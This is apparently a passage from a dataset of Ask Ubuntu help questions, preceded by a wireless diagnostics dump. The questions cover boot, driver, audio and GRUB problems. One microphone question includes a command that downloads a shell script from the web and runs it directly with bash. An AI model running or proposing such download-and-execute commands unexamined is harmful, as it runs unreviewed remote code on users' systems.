linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 046d : c534 logitech , inc . bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : '' **** '' mode : managed frequency:2.437 ghz access point : < mac address removed > bit rate=18 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=70/70 signal level=26 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:10407 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 search san.rr.com # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : wlan0 [ **** ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192ce state : connected default : yes hw address : < mac address removed > capabilities : speed : 18 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) hp-print-2a-photosmart 7520 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 50 wpa2 tinonet : infra , < mac address removed > , freq 2442 mhz , rate 54 mb/s , strength 67 wpa wpa2 bks : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 80 wpa wpa2 gp_home_2 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 67 wpa gp home : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 84 wpa ***** : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 70 wep 2wire842 : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 67 wpa wpa2 ipv4 settings : address : 192.168.1.108 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 209.18.47.61 dns : 209.18.47.62 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=56/70 signal level=-54 dbm encryption key : on essid : '' **** '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000c71b0ed9c0a extra : last beacon : 28ms ago ie : unknown : 000c6c6f7567686c696e686f6d65 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : unknown : 32040c121860 ie : unknown : dd06001018010100 cell 02 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=38/70 signal level=-72 dbm encryption key : on essid : '' hp-print-2a-photosmart 7520 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000257371c6af extra : last beacon : 28ms ago ie : unknown : 001b48502d5072696e742d32412d50686f746f736d6172742037353230 ie : unknown : 010802040b0c12161824 ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 2d1a0055010200050039010400580200007b01040058020000330102 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32043048606c ie : unknown : 3d1601000100000000000000000000000000000000000000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd7708000900040000000701020100020178031650686f746f736d617274203735323020736572696573040f37353235000000000000000f434e330510434e333252334230395630355858000006101c852a4db8001f08abcd7446a0d0d52a0704c0a80144080200d4090200080a04000000010b0400000000 cell 03 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=30/70 signal level=-80 dbm encryption key : on essid : '' 2wire842 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000257353e126 extra : last beacon : 28ms ago ie : unknown : 00083257495245383432 ie : unknown : 010882848b0c12961824 ie : unknown : 030101 ie : unknown : 0706555320010b1b ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 2a0100 ie : unknown : 32043048606c cell 04 - address : < mac address removed > channel:7 frequency:2.442 ghz ( channel 7 ) quality=28/70 signal level=-82 dbm encryption key : on essid : '' tinonet '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000004a6bc2c extra : last beacon : 1568ms ago ie : unknown : 000754696e6f6e6574 ie : unknown : 010882848b960c121824 ie : unknown : 030107 ie : unknown : 050400010000 ie : unknown : 0706555320010b1b ie : unknown : 2a0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32043048606c cell 05 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=60/70 signal level=-50 dbm encryption key : on essid : '' gp home '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=00000559623826ed extra : last beacon : 748ms ago ie : unknown : 0007475020486f6d65 ie : unknown : 010482848b96 ie : unknown : 03010b ie : unknown : 050400010000 ie : unknown : 2a0104 ie : unknown : 2f0104 ie : unknown : 32080c1218243048606c ie : unknown : dd09001018020ff0040000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 cell 06 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=60/70 signal level=-50 dbm encryption key : on essid : '' gp_home_2 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000005596238218a extra : last beacon : 752ms ago ie : unknown : 000947505f484f4d455f32 ie : unknown : 010482848b96 ie : unknown : 03010b ie : unknown : 05050001005201 ie : unknown : 2a0104 ie : unknown : 2f0104 ie : unknown : 32080c1218243048606c ie : unknown : dd09001018020ff0040000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 # # # # # iwlist channel # # # # # wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz current frequency:2.437 ghz ( channel 6 ) # # # # # lsmod # # # # # rtl8192ce 53550 0 rtl_pci 26690 1 rtl8192ce rtlwifi 63475 2 rtl_pci , rtl8192ce rtl8192c_common 53172 1 rtl8192ce mac80211 626557 3 rtl_pci , rtlwifi , rtl8192ce cfg80211 484040 2 mac80211 , rtlwifi # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko firmware : rtlwifi/rtl8192cfwu_b.bin firmware : rtlwifi/rtl8192cfwu.bin firmware : rtlwifi/rtl8192cfw.bin description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : ef063698748457bbedb4633 alias : pci : v000010ecd00008176sv*sd*bc*sc*i* alias : pci : v000010ecd00008177sv*sd*bc*sc*i* alias : pci : v000010ecd00008178sv*sd*bc*sc*i* alias : pci : v000010ecd00008191sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , rtl8192c-common , mac80211 intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko description : pci basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 9b7f19319428ff0efe7e350 depends : mac80211 , rtlwifi intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 27e91755814596d634b7709 depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192c/rtl8192c-common.ko description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : ziv huang < ziv_huang @ realtek.com > author : georgia < georgia @ realtek.com > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 32f826c623bc49f764f7974 depends : intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x8086:0x1502 ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8176 ( rtl8192ce ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 5.874716 ] psmouse serio2 : trackpoint : ibm trackpoint firmware : 0x0e , buttons : 3/3 [ 10.734416 ] rtl8192ce : using firmware rtlwifi/rtl8192cfw.bin [ 10.961718 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 10.961864 ] rtlwifi : wireless switch is on [ 14.594371 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 14.594569 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 16.767585 ] wlan0 : authenticate with < mac address removed > [ 16.787928 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 16.790347 ] wlan0 : authenticated [ 16.790529 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 16.790532 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 16.790534 ] rtl8192ce 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 16.791125 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 16.793605 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=8 ) [ 16.793810 ] wlan0 : associated [ 16.793829 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 16.795627 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=2 ) [ 16.819558 ] wlan0 : authenticate with < mac address removed > [ 16.819648 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 16.825109 ] wlan0 : authenticated [ 16.825226 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 16.825229 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 16.825230 ] rtl8192ce 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 16.827130 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 16.831240 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=8 ) [ 16.831377 ] wlan0 : associated [ 26.840359 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 28.130880 ] wlan0 : authenticate with < mac address removed > [ 28.140931 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 28.184291 ] wlan0 : authenticated [ 28.184410 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 28.184413 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 28.184415 ] rtl8192ce 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 28.186558 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 28.294625 ] wlan0 : associate with < mac address removed > ( try 2/3 ) [ 28.402693 ] wlan0 : associate with < mac address removed > ( try 3/3 ) [ 28.510766 ] wlan0 : association with < mac address removed > timed out [ 40.803268 ] wlan0 : authenticate with < mac address removed > [ 40.813135 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 40.909274 ] wlan0 : authenticated [ 40.909396 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 40.909399 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 40.909401 ] rtl8192ce 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 40.910899 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 40.927199 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=8 ) [ 40.927357 ] wlan0 : associated [ 264.361914 ] wlan0 : deauthenticated from < mac address removed > ( reason : 7 ) [ 264.376190 ] wlan0 : authenticate with < mac address removed > [ 264.376344 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 264.381082 ] wlan0 : authenticated [ 264.381342 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 264.381351 ] rtl8192ce 0000:03:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 264.381356 ] rtl8192ce 0000:03:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 264.383539 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 264.385799 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=8 ) [ 264.385977 ] wlan0 : associated # # # # # # # # # # wireless info end # # # # # # # # # # # #
482572	bootup problems	i have installed refit but i could not get my mac to boot up in ubuntu by default so i installed grub customizer but grub does not load when i reboot only refit . the problem with refit is that my wireless mac keyboard only works if i made a boot from os x if i boot from ubuntu the keyboard does not work and then by default refit boot into mac os x : - ) . if i have used mac os x and then boot into ubuntu my keyboard only workes after i have tuned it on and off under the menu in the top right corner in ubunto .
482573	trying to update asus bios	my ux31 zenbook is experiencing some weird shutdown behavior when the battery drops below 50 % and the internet seems to agree that updating the bios is a good step forward since there were issue with the kernel before . i downloaded both the correct bios file and the windows 7 utility tool and now need to boot freedos to run , however , i 've tried every method out there and they all fail ( or so i think ) : using unetbootin 's freedos 1.0 image i get to an error saying it could n't run drivers then i get to a command line on disk a : . i assumed a dead end . using unetbootin but with the freedos 1.1 version image downloaded directly : get an error of `` bad or missing command interpreter '' . i looked online and the solutions did n't work either . so , is there an alternative to freedos or to installing a bios that i could use ?
482574	unable to start snmpd	i tried to run dpkg -r to remove an installed package but got the following : > sudo dpkg -r my-pckg ( reading database ... 57461 files and directories currently installed . ) removing my-pckg ... no munin plugin provided . not deconfiguring munin deconfiguring snmp entries warning : failed to restart snmpd service . . please run sudo service snmpd restart processing triggers for ureadahead ... when i tried to restart snmpd , i got the following > sudo service snmpd restart * restarting network management services : when i list all the services ( sudo service -- status-all ) , snmpd is showing as [ - ] snmpd what is the role of snmpd in dpkg removal ? how can i fix this issue ?
482580	newly upgraded ubuntu 14.04 - slow ?	have been running ubuntu 10/puppy linux - excellent performance . just replaced it with 32-bit ubuntu 14.04 . pc has 1.5mb ram . i am now experiencing very slow performance . is this due to 14.04 's size and complexity ? or something else ? thanks
482583	ubuntu 14.04 i want my computer to talk to me at startup	using festival jovie need a script to run at start up so computer will talk to me .
482586	clean ubuntu 14.04 install taking longer to boot after kernel upgrade	hello this is my first post . i own an asus chromebox ( 2gb ram , 16 gb sdd , 3.0 usb ports ) and fresh installed ubuntu 14.04 x64 . i decided to upgrade kernel because i was experiencing some freezing issues with xbmc , so first i installed stable kernel 3.14.04 from mainline and boot time was fine ( it booted very fast i would say about 5 seconds ) then after a while i installed kernels 3.15 and 3.14.06 but this time i also removed old stock kernels ( dunno if that has something to do ) after that the problem began , boot time is taking way longer , i would say about 30 seconds . finally today i installed kernel 3.14.07 , set grub to boot with that by default but same thing : ( i post boot.log and dmesg , hope it is correct for this matter , if you need any other log just let me know . boot.log dmesg
482587	files/programs on removable hdd	i 'm going to install ubuntu onto my dad 's computer that is running windows xp . he wants all his files and his microsoft programs ( word , excel ) to be on the computer after ubuntu is installed . we have moved all the files/programs to an external hard drive . this may be dumb question , but will we be able to move them to the internal hard drive ? or will they be removed ?
482590	ubuntu server and schooltool	i want to install schooltool on a remote webserver for trying it with some colleagues and i could not find any ubuntu free web server where to install it and isntructions on how to install it on a remote web server . does anyone know one ? thanks in advance
482593	how to get justgetflux working in ubuntu 14.04	i installed justgetflux indicator applet in ubuntu 14.04 but it does n't work . are there any alternatives other than justgetflux for ubuntu 14.04 .
482600	re : # 47209 how to copy an existing hd to a new one and have it be bootable ?	help please ! my backup method of choice is to clone my `` working '' drive to another identical drive . i have 2 windows drives and i clone my working one to the other one once per month . no problem - each will boot if i select it . now with the lack of future support for xp , i am getting familiar with ubuntu 14.04 lts . i have it on one drive and i have a second identical drive that i want to be able to clone it to once/month . not as necessary to do this with ubuntu as with windows , i know , but i 'm anal . so i have followed # 47209 mestrelion 's procedure with just the two ubuntu drives `` on line '' . i.e. , boot my `` working '' drive with live cd , use gparted to be sure i know what 's what , open terminal and enter and execute the dd command , go to bed till the clone is done , shut down the computer , disconnect the input/source drive , boot up using bios to select the remaining output drive . the drive starts fine but all is not ok . it puts up a screen that says i 'm on a guest session and asks for a password . well , for one thing i have my ubuntu set up to start without a password being entered . i have one , of course , i put it in but it is n't accepted . i ca n't get by this guest session screen . i am fine , of course . i can disconnect this drive , hook up my `` main '' ubuntu drive and all the rest , and go on with my business . but i do n't have the desired `` emergency backup '' drive working where i could jump on and use it immediately if i needed it . can someone give me some guidance here ? ? what ( else ) do i need to do . love ubuntu but learning . thanks , wes .
482604	keyboard backlight not working	i 'm using ubuntu 12.04 on a toshiba satellite p775-s7100 . the keyboard backlight was working initially , but after reinstalling the same version of ubuntu it stopped working , and as far as i can tell , it does n't interact with ubuntu at all . is there any way to fix this short of reinstalling ubuntu again ?
482606	does ubuntu support ibmvfc ?	does 14.04 support ibmvfc modules for loading to a system with virtual fiber channel , previous versions only had ibmvscsi support .
482618	remove ubuntu 14.04 bootloader entry in windows 8.1 bootloader efi entry ?	recently i installed ubuntu 14.04 on windows 8.1 pre-installed pc as dual boot . but due to some reasons i removed ubuntu 14.04 from my pc.even though i removed ubuntu from my pc ubuntu entry in windows efi bootloader remains . i tried deleting entry using ubuntu live cd and easybcd software tool though it remains in efi bootloader entry .
482619	seeking information about driver for hp laptop .	i have installed ubuntu 13.10 in my hp laptop . do i need to install drivers for my sound , graphics , wifi , bluetooth etc . or the ubuntu have it pre-installed in it .
482620	ubunto on hp proliant mi 350 gen 8 server	have a server hp proliant mi 350 gen 8 server / intel xeon e5-2403 processor 10mb cache/4core processor / 16gb ddr3-1600 ecc ( 4x4gb ) ram 12 dimm slots/ 2 x 1tb sata hdd with raid 1 support / smart array b120i sata controller / dvdrw drive/ 1 x 460 watts smps/ dual 1gb ethernet port 361i adapter / pcle3.0 fhfl ( x4 ) / pcle 2.0 fhfl ( x1 ) / pcle 2.0 fhfl ( x1 ) / hpilo 4.0 and hp pavilion ips 20fi led backlit lcd monitor ( 1no . ) pl advise how to install ubuntu as an os
482621	lyx is not working in newly upgraded 14.04 version	i have been using lyx software whenever i have upgraded from 12.04 to 14.04 . in upgraded 14.04 the lyx software is working but it could not give the pdf file instead it has given a message `` file does not exist : /tmp/lyx_tmpdir.mt5569/lyx_tmpbuf2/newfile1.pdf '' anyone help me in this context . thanks in advance ... .
482622	default font and font size in libreoffice calc 4.2.3.3	i have libreoffice version : 4.2.3.3 , build id : 420m0 ( build:3 ) installed from the software center . my os is lubuntu 14.04 . i want to have liberation sans 11 as my default font . how do i do that ? if i open a new spreadsheet the font is liberation sans 10 . if i select the whole spreadsheet and specify liberation sans 11 , whatever i type is in liberation sans 11 but if i use ctrl+x to cut the contents of a cell , and come back later to that same cell and enter text there , the font size is back to 10 in that cell .
482625	artifacts in desktop with ac power	my problem is this : after an update with apt-get dist-upgrade , i have artifacts ( lots of horizontal lines appear and disappear quickly ) on my desktop only with notebook charging or ac source . with power from the battery the problem disappears . what could be causing this ? i have kubuntu 13.10 and tlp application installed , otherwise i do n't know what could be causing this . follows my setup : hp envy dv7-7270ca notebook , core i7 , 8gib ram , geforce gt 630m with nouveau drivers .
482626	microphone not working on ubuntu 14.04 on macbookpro10,2	i have ubuntu 14.04 on my macbook pro retina macbookpro10,2 and the microphone does not work at all . it has worked in 13.04 and 13.10 but now after a clean install , no luck . i ran this script to get some more info wget http : //www.alsa-project.org/alsa-info.sh -o alsa-info.sh & & bash alsa-info.sh which uploaded the info to http : //www.alsa-project.org/db/ ? f=140db56ebf8372fc1ee6026a8164c610264d8165 i 'm not sure what i 'm looking for though . i 've tried reinstalling alsa and also installing pulseaudio with no luck . the speakers are working just fine . here is a screnshot of alsamixer . i 've tried switching to internal mic 1 with no luck . i 'm looking forward to any help . i 'm really struggling without a microphone as i work from home and do a lot of voip calls .
482630	maas enlistment network problem	similar to maas nodes stuck on `` maas-enlisting-node '' , but different . attempted to enlist a node on a newly set up maas server . maas server consists of 2 nics , one attached to maas subnet , an the other to public subnet . ( these nics are not bridged and /proc/ ... ip_forward contains 1 . ) pxe boot proceeds as expected ; however , node gets stuck in `` maas-enlisting-node login '' prompt . it remains in this state until default gateway is removed , or , alternatively , public facing nic is brought down . any thoughts ?
482636	middle-button scrolling on thinkpad w540	i just got a w540 today and found out the touchpad is different than the previous models . while the previous models have three actual keys ( left , middle , right ) , the new model has no key and the whole touchpad is a button . in the old models you can scroll a page but holding the middle button and move the trackpoint . is it possible to do that on w540 ? if not , is there anyway to enable `` one-finger scrolling '' ? that is , i want the whole touchpad to be a scrolling pad ... as long as i move finger there it will scrolls . is that possible ? the system is ubuntu 14.04 . thanks !
482638	rapidminer bit architecture	i downloaded a rapidminer source file : `` rapidminer-5.3.013.zip '' from sourceforge ... however i am having trouble extending r to it . i need to check the bit architecture of the rapidminer software running on my ubuntu ( 32 or 64 bit ) ... can you please provide me with some clues on how i can do that ? i run rapidminer from the commandline by : java -jar $ rapidminer_home/lib/rapidminer.jar i know my java is a 64-bit one if that provides any indication ...
482639	ca n't log in ubuntu 14.04	i have a problem that started just yesterday after using upgrade version of ubuntu 14.04 since its release . namely , all of a sudden , ubuntu wo n't accept my password . i changed it with passwd user , ubuntu seemed to have accepted the new password , but yet again , it wo n't let me log in . it looks like ubuntu is recognizing the password , starts the login process , but then it takes me back again to the welcome screen . let me stress that i knew my password , that it was working properly and i had no problems whatsoever . i have a dual boot system with ubuntu 14.04 and xubuntu 14.04 , so luckily , all my ubuntu files are accessible from xubuntu . any suggestions ? thanks
482641	cygwin ssh x forwarding - âthe system network services are not compatible with this version.â	i connect to ubuntu system from windows system using cygwin and putty with x forwarding . when i try to change network settings in unity-control-center i get `` the system network services are not compatible with this version '' dialog window . is it something to do with policy kit ? how to able to perform all types of ( non graphic intensive ) tasks remotely using cygwin x server . i also get this `` libgl error : failed to load driver : swrast '' ; how can i avoid it ?
482647	does ubuntu support intel x86 emulator accelerator ( haxm ) for android emulator ?	why intel x86 emulator accelerator ( haxm ) for android emulator does not exist for ubuntu and only exist for mac os and windows ?
482650	how to get rid of grub menu after boot ?	here is my /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_linux_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' i tried various things including : how do i hide the grub menu showing up in the beginning of boot ? how to disable grub 's menu from showing up after failed boot http : //www.itworld.com/software/306238/disable-grub-boot-menu-ubuntu-1210 but i still get grub menu each time i boot . my generated /boot/grub/grub.cfg : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set 